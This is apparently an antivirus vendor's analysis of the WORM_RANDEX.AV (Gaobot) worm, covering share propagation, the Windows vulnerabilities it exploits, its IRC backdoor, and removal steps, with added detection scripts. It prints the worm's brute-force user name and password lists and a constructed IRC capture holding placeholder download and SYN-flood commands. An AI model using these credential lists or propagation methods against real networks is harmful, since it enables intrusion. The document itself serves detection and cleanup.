WORM_RANDEX.AV

Malware type: Worm

Aliases: W32/Gaobot.worm

In the wild: Yes

Destructive: No

Language: English

Platform: Windows 95, 98, ME, NT, 2000, XP

Encrypted: No

Damage potential:

High

Distribution potential:

High

Description: 

This worm arrives as JMV2.EXE on target machines. It spreads by dropping a copy of itself into accessible network shares. If a share requires authentication, it tries a built-in list of weak user names and passwords (listed under Technical Details) as its login credentials to gain access.

It also exploits known Windows vulnerabilities to propagate itself; the corresponding Microsoft security bulletins are listed under "Vulnerability used" in the Technical Details section.

It also has backdoor capabilities. It connects to an Internet Relay Chat (IRC) server, where it listens for commands issued by a remote malicious user. This allows the remote malicious user to gain control of the infected machine.

It steals the Microsoft Windows product ID and CD keys of several popular games.


Description created: Mar. 22, 2005 7:28:24 PM GMT -0800


TECHNICAL DETAILS


File type: PE

Memory resident:  Yes

Size of malware: 164,864 Bytes

Initial samples received on: Mar 15, 2005

Compression type: ASProtect

Vulnerability used:  (MS04-011) Security Update for Microsoft Windows (835732), (MS03-007) Unchecked Buffer In Windows Component Could Cause Server Compromise (815021), (MS03-026) Buffer Overrun In RPC Interface Could Allow Code Execution, (MS02-061) Elevation of Privilege in SQL Server Web Tasks (Q316333)

Details:

Installation and Autostart Techniques

Upon execution, this worm drops a copy of itself in the Windows system folder as JMV2.EXE. It then deletes the originally executed copy.

It creates several threads to be used for its key logging and other backdoor capabilities.

It also creates the following registry entries to enable its automatic execution at every system startup:

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run
USB DRIVER="Jmv2.exe"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
USB DRIVER="Jmv2.exe"

Network Propagation and Exploits

This worm spreads via network shares using NetBEUI functions. It enumerates the following shares on reachable machines: IPC$ is used to establish the authenticated session, and the copy of the worm is written into the administrative shares, so that it lands in the target's system folder:

  • ADMIN$\system32
  • C$\WINDOWS\system32
  • C$\WINNT\system32
  • IPC$

It looks for and uses the following weak user names:

  • access
  • backup
  • barbara
  • blank
  • brian
  • bruce
  • capitol
  • cisco
  • compaq
  • control
  • database
  • databasepass
  • databasepassword
  • db1234
  • dbpass
  • dbpassword
  • domain
  • domainpass
  • domainpassword
  • exchange
  • exchnge
  • frank
  • freddy
  • george
  • headoffice
  • heaven
  • internet
  • intranet
  • katie
  • login
  • loginpass
  • nokia
  • oeminstall
  • office
  • orange
  • peter
  • siemens
  • spencer
  • sqlpass
  • staff
  • student
  • student1
  • susan
  • teacher
  • technical
  • turnip
  • user1
  • userpassword
  • winpass
  • yellow

It also uses the following weak passwords:

  • 12346
  • 123467
  • 1234678
  • 12346789
  • 123467890
  • accounting
  • accounts
  • admin
  • administrator
  • changeme
  • default
  • guest
  • homeuser
  • internet
  • oemuser
  • outlook
  • pass1234
  • passwd
  • password
  • password1
  • qwerty
  • server
  • system
  • user1
  • win2000
  • win2k
  • win98
  • windows
  • winnt
  • winxp
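On a targeted host, the share propagation described above shows up as a burst of failed network logons from one source IP, each with a different user name from the worm's list, and, if a pair works, a successful network logon from the same source shortly after. The following script is an added example, not part of the Trend Micro write-up: it flags that pattern from failed-logon events. The one-line-per-event export format, host name and IP addresses are constructed for the example; real Security log exports are laid out differently. The event IDs are the real Windows ones: 529 (logon failure) and 528 (successful logon) on NT/2000/XP, the systems this worm targets, and 4625/4624 on Vista and later. Logon type 3 is a network logon, which is what a share connection produces.

```python
"""Flag the credential spraying this worm generates against ADMIN$, C$ and IPC$."""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON = {"529", "4625"}    # NT/2000/XP event 529, Vista+ event 4625
SUCCESS_LOGON = {"528", "4624"}   # successful logon, same two generations

# Subset of the worm's built-in user names, taken from the write-up above.
WORM_USER_NAMES = {"access", "backup", "barbara", "blank", "brian", "bruce",
                   "database", "dbpass", "domain", "exchange", "login",
                   "oeminstall", "office", "staff", "student", "teacher"}

# Constructed sample: infected host 10.0.0.5 sprays file server FS01 and
# finally succeeds as "student"; user 10.0.0.9 merely mistypes a password twice.
SAMPLE_LOG = """\
2005-03-15T10:00:01Z id=529 host=FS01 src=10.0.0.5 user=access type=3
2005-03-15T10:00:01Z id=529 host=FS01 src=10.0.0.5 user=backup type=3
2005-03-15T10:00:02Z id=529 host=FS01 src=10.0.0.5 user=barbara type=3
2005-03-15T10:00:02Z id=529 host=FS01 src=10.0.0.5 user=blank type=3
2005-03-15T10:00:03Z id=529 host=FS01 src=10.0.0.5 user=brian type=3
2005-03-15T10:00:03Z id=529 host=FS01 src=10.0.0.5 user=bruce type=3
2005-03-15T10:00:04Z id=529 host=FS01 src=10.0.0.5 user=database type=3
2005-03-15T10:00:04Z id=529 host=FS01 src=10.0.0.5 user=exchange type=3
2005-03-15T10:00:05Z id=529 host=FS01 src=10.0.0.5 user=login type=3
2005-03-15T10:00:05Z id=529 host=FS01 src=10.0.0.5 user=staff type=3
2005-03-15T10:00:06Z id=528 host=FS01 src=10.0.0.5 user=student type=3
2005-03-15T10:07:30Z id=529 host=FS01 src=10.0.0.9 user=jsmith type=3
2005-03-15T10:07:41Z id=529 host=FS01 src=10.0.0.9 user=jsmith type=3
"""


def parse_event(line):
    """Parse one constructed 'timestamp key=value ...' line into a dict."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def detect_spray(log_text, window=timedelta(seconds=60), min_users=5):
    """Return one alert per (target host, source IP) whose network logons
    failed for at least `min_users` distinct user names inside `window`.
    A successful logon from the same source inside that window is reported
    too: it means a weak pair worked and the share drop likely succeeded."""
    events = sorted((parse_event(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e["ts"])
    by_pair = defaultdict(list)
    for e in events:
        if e.get("type") == "3":            # network logon = share access
            by_pair[(e["host"], e["src"])].append(e)

    alerts = []
    for (host, src), evs in by_pair.items():
        fails = [e for e in evs if e["id"] in FAILED_LOGON]
        burst_start, burst_users = None, set()
        # Sliding window: the densest run of distinct user names per source.
        for i, first in enumerate(fails):
            users = {e["user"] for e in fails[i:]
                     if e["ts"] - first["ts"] <= window}
            if len(users) > len(burst_users):
                burst_start, burst_users = first["ts"], users
        if len(burst_users) < min_users:
            continue
        successes = [e["user"] for e in evs if e["id"] in SUCCESS_LOGON
                     and timedelta(0) <= e["ts"] - burst_start <= window]
        alerts.append({
            "host": host,
            "src": src,
            "distinct_users": len(burst_users),
            "from_worm_list": len(burst_users & WORM_USER_NAMES),
            "success_after_spray": successes,   # non-empty: treat src as infected
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG):
        print(alert)
```

The worm tries every user name against every password, so the order of attempts varies between samples; keying on distinct user names per source within a short window catches the pattern either way, while the two-failure case from 10.0.0.9 stays below the threshold. A source that trips the alert and then logs on successfully should be treated as an infected host and its target's system folder checked for JMV2.EXE.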

It also exploits the following known Windows vulnerabilities (the Microsoft security bulletins are the ones listed under "Vulnerability used" above):

  • SQL Server Buffer Overflow vulnerability (MS02-061)
  • IIS/WEBDAV vulnerability (MS03-007)
  • RPC/DCOM vulnerability (MS03-026)
  • LSASS vulnerability (MS04-011)

Backdoor Capabilities

This worm acts as an Internet Relay Chat (IRC) bot that connects to an IRC server. Once the connection is established, it listens for commands issued by a remote malicious user and executes them locally on the affected machine, giving the remote user effective control over the affected system.

The bot allows a remote user to do the following:

  • Capture pictures and video clips
  • Change BOT ID
  • Disconnect the bot from IRC
  • Display connection type, local IP address and other network information
  • Display network information
  • Display system information
    • Amount of memory
    • CPU speed
    • Malware uptime
    • User name
    • Windows platform, build version and product ID
  • Display the driver list
  • Download from HTTP and FTP URL
  • Generate a random nickname
  • Get screen capture
  • Issue ping attack on a target computer
  • Let the bot perform mode change
  • List all running processes
  • Log on and log off the user
  • Make the bot join a channel
  • Open a command shell
  • Open files
  • Perform different kinds of denial of service (DoS) attacks
  • Rename a file
  • Retrieve and clear log files
  • Send a message to the IRC server
  • Steal CD keys of games
  • Stop and start a thread
  • Terminate the bot
  • Update worm from HTTP and FTP URL
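When reviewing a packet capture of this backdoor, what an analyst sees is an ordinary IRC session: the bot registers a nickname, joins a channel, and the operator's commands arrive as PRIVMSG lines to that channel. The script below is an added example, not code from the Trend Micro write-up or the bot itself. It parses IRC lines per the RFC 1459 grammar (":prefix COMMAND params :trailing") and pulls the operator's commands and the bot's replies out of a session. The session, server name, channel, nickname and the command words (".sysinfo", ".download", ".ddos.syn") are placeholders constructed for the example; the write-up gives none of the bot's real command strings.

```python
"""Reconstruct a bot's IRC command channel from captured lines."""
from dataclasses import dataclass


@dataclass
class IrcMessage:
    direction: str   # "C>" bot to server, "S>" server to bot
    prefix: str      # sender, e.g. "nick!user@host" (empty for client lines)
    command: str     # verb or numeric reply
    params: list     # middle parameters
    trailing: str    # text after the first " :"


def parse_irc_line(direction, raw):
    """Split one IRC line into prefix, command, middle params and trailing."""
    prefix = ""
    if raw.startswith(":"):
        prefix, _, raw = raw[1:].partition(" ")
    body, _, trailing = raw.partition(" :")
    parts = body.split()
    return IrcMessage(direction, prefix, parts[0].upper(), parts[1:], trailing)


def nick_of(prefix):
    """'nick!user@host' -> 'nick'."""
    return prefix.split("!", 1)[0]


# Constructed capture of both sides of the conversation (placeholder values).
CAPTURED_SESSION = [
    ("C>", "NICK qxk7a2ve"),
    ("C>", "USER qxk7a2ve 0 * :qxk7a2ve"),
    ("S>", ":irc.example.invalid 001 qxk7a2ve :Welcome"),
    ("C>", "JOIN #lobby"),
    ("S>", ":qxk7a2ve!user@10.0.0.5 JOIN :#lobby"),
    ("S>", ":op!op@203.0.113.7 PRIVMSG #lobby :.sysinfo"),
    ("C>", "PRIVMSG #lobby :[SYSINFO] cpu: 2400MHz mem: 512MB os: XP uptime: 14m"),
    ("S>", ":op!op@203.0.113.7 PRIVMSG #lobby :.download http://203.0.113.7/upd.exe 1"),
    ("S>", ":op!op@203.0.113.7 PRIVMSG #lobby :.ddos.syn 198.51.100.20 80 600"),
    ("S>", "PING :irc.example.invalid"),
    ("C>", "PONG :irc.example.invalid"),
]


def summarize_session(session):
    """Return the bot's nick, the channels it joined, the commands other
    nicks sent to those channels (or to the bot directly) and the bot's replies."""
    nick, channels, commands, replies = None, set(), [], []
    for direction, raw in session:
        m = parse_irc_line(direction, raw)
        if m.direction == "C>" and m.command == "NICK":
            nick = m.params[0]
        elif m.direction == "C>" and m.command == "JOIN":
            channels.update(m.params[0].split(","))
        elif m.direction == "S>" and m.command == "PRIVMSG":
            target, sender = m.params[0], nick_of(m.prefix)
            if sender != nick and (target in channels or target == nick):
                commands.append((sender, m.trailing))
        elif m.direction == "C>" and m.command == "PRIVMSG":
            replies.append(m.trailing)
    return {"nick": nick, "channels": sorted(channels),
            "commands": commands, "replies": replies}


if __name__ == "__main__":
    summary = summarize_session(CAPTURED_SESSION)
    print("bot nick:", summary["nick"], "channels:", summary["channels"])
    for sender, cmd in summary["commands"]:
        print(f"  {sender} -> {cmd}")
```

The partition on the first " :" is what makes the trailing parameter come out right even when the command text itself contains colons, as URLs do. In a real capture the operator's nick, the channel and the download URL are the indicators worth extracting: the URL names the server the "Update worm from HTTP and FTP URL" command will fetch from.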

Denial of Service

This worm performs a denial of service (DoS) attack by performing the following flood attacks on random IP addresses:

  • HTTP flood
  • ICMP flood
  • SYN flood
  • UDP flood

Information Theft

This worm steals the Microsoft Windows product ID and CD keys of the following games:

  • Battlefield 1942
  • Battlefield 1942 (Road To Rome)
  • Battlefield 1942 (Secret Weapons of WWII)
  • Battlefield Vietnam
  • Black and White
  • Chrome
  • Command and Conquer: Generals
  • Command and Conquer: Generals (Zero Hour)
  • Command and Conquer: Red Alert
  • Command and Conquer: Red Alert 2
  • Command and Conquer: Tiberian Sun
  • Counter-Strike (Retail)
  • FIFA 2002
  • FIFA 2003
  • Freedom Force
  • Global Operations
  • Gunman Chronicles
  • Half-Life
  • Hidden & Dangerous 2
  • IGI 2: Covert Strike
  • Industry Giant 2
  • James Bond 007: Nightfire
  • Legends of Might and Magic
  • Medal of Honor: Allied Assault
  • Medal of Honor: Allied Assault: Breakthrough
  • Medal of Honor: Allied Assault: Spearhead
  • Nascar Racing 2002
  • Nascar Racing 2003
  • Need For Speed Hot Pursuit 2
  • Need For Speed: Underground
  • Neverwinter Nights (Hordes of the Underdark)
  • Neverwinter Nights (Shadows of Undrentide)
  • NHL 2002
  • NHL 2003
  • Rainbow Six III RavenShield
  • Shogun: Total War: Warlord Edition
  • Soldier of Fortune II - Double Helix
  • Soldiers Of Anarchy
  • The Gladiators
  • Unreal Tournament 2003
  • Unreal Tournament 2004

Other Details

This worm runs on Windows 95, 98, ME, NT, 2000, and XP.

Analysis By: Dexter See To


SOLUTION


Minimum scan engine version needed: 6.810

Pattern file needed: 2.473.04

Pattern release date: Mar 6, 2005


Important note: The "Minimum scan engine" refers to the earliest Trend Micro scan engine version guaranteed to detect this threat. However, Trend Micro strongly recommends that you update to the latest version in order to get comprehensive protection.

Solution:

Identifying the Malware Program

To remove this malware, first identify the malware program.

  1. Scan your system with your Trend Micro antivirus product.
  2. NOTE all files detected as WORM_RANDEX.AV.

Trend Micro customers need to download the latest pattern file before scanning their system. Other users can use Housecall, Trend Micro's online virus scanner.

Terminating the Malware Program

Since this malware terminates Task Manager, you have to use a third-party process viewer such as Process Explorer to terminate the malware process (JMV2.EXE).

Removing Autostart Entries from the Registry

Removing autostart entries from the registry prevents the malware from executing at startup.

  1. Open Registry Editor. Click Start>Run, type REGEDIT, then press Enter.
  2. In the left panel, double-click the following:
    HKEY_LOCAL_MACHINE>Software>Microsoft>
    Windows>CurrentVersion>Run
  3. In the right panel, locate and delete the entry:
    USB DRIVER = "Jmv2.exe"
  4. In the left panel, double-click the following:
    HKEY_CURRENT_USER>Software>Microsoft>
    Windows>CurrentVersion>Run
  5. In the right panel, locate and delete the entry:
    USB DRIVER = "Jmv2.exe"
  6. Close Registry Editor.

NOTE: If you were not able to terminate the malware process as described in the previous procedure, restart your system before proceeding.
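The two Run values shown under "Installation and Autostart Techniques" and removed in the steps above can also be reviewed offline, which is useful when triaging several machines or when the infected system cannot be trusted to run tools. The following script is an added example, not part of the Trend Micro write-up. It assumes the two Run keys were exported from the suspect machine with reg.exe (for example `reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" hklm_run.reg`; reg.exe writes UTF-16LE, so decode real files with that encoding) and parses the .reg text for the worm's entry. The sample export below is constructed; the SynTPEnh and ctfmon.exe entries are stand-ins for legitimate values. Beyond the specific "USB DRIVER" / Jmv2.exe indicator, it also flags any Run value whose data is a bare file name with no path, the form this worm uses because Windows then resolves the name through the search path and finds the copy in the system folder.

```python
"""Offline review of exported Run keys for this worm's autostart entry."""
import re

RUN_KEYS = {
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
}
WORM_VALUE_NAME = "usb driver"   # value name from the write-up
WORM_FILE_NAME = "jmv2.exe"      # dropped file name from the write-up

# Constructed .reg export; in real exports backslashes are doubled exactly like this.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SynTPEnh"="C:\\Program Files\\Synaptics\\SynTP\\SynTPEnh.exe"
"USB DRIVER"="Jmv2.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"USB DRIVER"="Jmv2.exe"
'''

# "name"="data" lines (REG_SZ); \" and \\ are the .reg escape sequences.
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s):
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Yield (key, value_name, data) for every REG_SZ value in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and (m := _VALUE_RE.match(line)):
            yield key, _unescape(m.group(1)), _unescape(m.group(2))


def find_autostart_iocs(text):
    """Return findings for the worm's Run entry plus any Run value whose data
    is a bare file name (arguments are not stripped; a path with arguments
    still counts as having a path)."""
    wanted = {k.lower() for k in RUN_KEYS}
    findings = []
    for key, name, data in parse_reg_export(text):
        if key.lower() not in wanted:
            continue
        exe = data.strip().strip('"')
        base = exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        reasons = []
        if name.lower() == WORM_VALUE_NAME or base == WORM_FILE_NAME:
            reasons.append("WORM_RANDEX.AV autostart entry")
        if "\\" not in exe:
            reasons.append("bare file name, no path")
        if reasons:
            findings.append({"key": key, "name": name, "data": data,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_autostart_iocs(SAMPLE_REG):
        print(f["key"], "|", f["name"], "=", f["data"], "|", ", ".join(f["reasons"]))
```

Both hives are checked because the worm writes the same value under HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER; deleting only one leaves the other to restart it. The "bare file name" heuristic is deliberately generic: it will also surface other malware that uses the same trick, and occasionally a sloppy legitimate installer, so treat it as a review prompt rather than a verdict.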

Additional Windows ME/XP Cleaning Instructions

Users running Windows ME and XP must disable System Restore to allow full scanning of infected systems.

Users running other Windows versions can proceed with the succeeding procedure set(s).

Running Trend Micro Antivirus

Scan your system with Trend Micro antivirus and delete files detected as WORM_RANDEX.AV. To do this, Trend Micro customers must download the latest pattern file and scan their system. Other Internet users can use HouseCall, Trend Micro's online virus scanner.

Applying Patches

This malware exploits known Windows vulnerabilities. Download and install the Microsoft patches for the security bulletins listed under "Vulnerability used" above:

  • MS04-011 Security Update for Microsoft Windows (835732)
  • MS03-007 Unchecked Buffer in Windows Component Could Cause Server Compromise (815021)
  • MS03-026 Buffer Overrun in RPC Interface Could Allow Code Execution
  • MS02-061 Elevation of Privilege in SQL Server Web Tasks (Q316333)

Refrain from using the affected software until the appropriate patch has been installed. Trend Micro advises users to download critical patches upon release by vendors.



